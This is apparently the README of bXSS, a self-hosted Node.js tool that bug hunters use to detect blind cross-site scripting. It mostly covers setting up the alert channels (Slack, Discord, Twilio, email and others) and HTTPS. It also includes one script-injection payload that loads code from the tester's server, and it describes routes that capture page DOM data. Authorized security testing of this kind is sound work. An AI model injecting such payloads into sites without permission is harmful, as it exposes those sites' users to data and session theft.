bXSS is a utility which can be used by bug hunters and organizations to identify Blind Cross-Site Scripting.
bXSS supports the following:
- Intrusive Levels
- Twilio
- Slack
- Webex Teams
- Discord
- Github
- Payload Generation
- Save locally
- Server you control
- Usable domain
- Node.js and Express.js
- Twilio Account
- Slack Token
- Cisco Token
- Discord Token
- Github Access Token
- Twitter Developer Account
- SSL/TLS Certificate
- cd bXSS && npm install
- Update The Configuration || Environment Variables
- Domain
- config.url = Domain intended for use e.g ardern.io
- config.port.http = Port to run the Node.js app e.g 80
- Domain
- Rename configExample.js to config.js
Configuring Services
Services are optional, by default bXSS will save a markdown file to disk. If you don't want to use any service documented below, just delete the service from the config.
- Twilio
- config.twilio.accountSid = Twilio SID
- config.twilio.authToken = Twilio Auth Token
- config.twilio.to = ['+447500000000','+0018056826043'] Your telephone number(s)
- config.twilio.from = Twilio telephone number
- Slack
- config.slack.token = Slack Token
- config.slack.channel = Channel you want to send the report to
- Slack permissions required channels:read and chat:write
- Cisco
- config.ciscoSpark.token = Cisco Token
- config.ciscoSpark.sparkRoom = ['[email protected]','[email protected]']
- Discord
- Steps to create a bot:
- Visit https://discordapp.com/developers/applications/
- Create a new application (e.g bXSSForCompany)
- Make a note of your CLIENT ID
- Select 'Bot'
- Choose a USERNAME and press 'Click to Reveal Token' (copy the token)
- Visit the following URL (update with your CLIENT ID) https://discordapp.com/oauth2/authorize?&client_id=YOUR_CLIENT_ID&scope=bot&permissions=2048
- Select the server you want your bot to join and authorize
- Update the following values below for the bot to post to the 'text channel' e.g ('general')
- config.discord.token = 'your bot token'
- config.discord.channel = 'channel that you want it to join, e.g general'
- Steps to create a bot:
- Twitter
- config.twitter.consumer_key = API Key
- config.twitter.consumer_secret = API Secret Key
- config.twitter.access_token_key = Application Access Token
- config.twitter.access_token_secret = Application Access Token Secret
- Permissions (Write)
- config.twitter.recipient_id = Twitter User ID, which can be found here
- config.smtp.user = email username
- config.smtp.pass = email password
- config.smtp.port = port you are connecting to e.g 465
- config.smtp.host = host you are connecting to e.g smtp.example.com
- config.smtp.to = ['[email protected]','[email protected]'] where you want to send the emails
- config.smtp.tls = use TLS, boolean true or false
- Github
- config.github.accessToken = ''
- config.github.repo = '' an example is lewisardern/bXSS
Setting Up HTTPS
Consider using a reverse proxy, for example in NGINX, but if you want to configure HTTPS using express, follow the steps below:
- Obtain a let's Encrypt cert
- Using Node.js
- Update Configuration
- config.letsEncrypt.TLS = true;
- config.letsEncrypt.publicKey = $Path/fullchain.pem
- config.letsEncrypt.privateKey = $Path/privkey.pem
- config.letsEncrypt.ca = $Path/chain.pem
- config.port.https = 443
- Update Configuration
Starting The Application
Once you have configured the above, simply start the server with any available utility at the application root directory:
- node app.js
- nodemon app.js
- pm2 start app.js
Once the application is functional, you would just identify sites you are authorized to test and start to inject different payloads that will attempt to load your resource, the easiest example is:
"><script src="https://example.com/m"></script>
The application has the following routes:
- POST - /m (Captures DOM information)
- GET - /mH (Captures HTTP interactions)
- GET - /alert (displays alert(1))
- GET - /payloads (Gives payloads you can use for testing blind xss)
- GET - /** (All other routes load the payload)
If you like the project, feel free to contribute or if you want to suggest improvements or notice any problems, file a issue.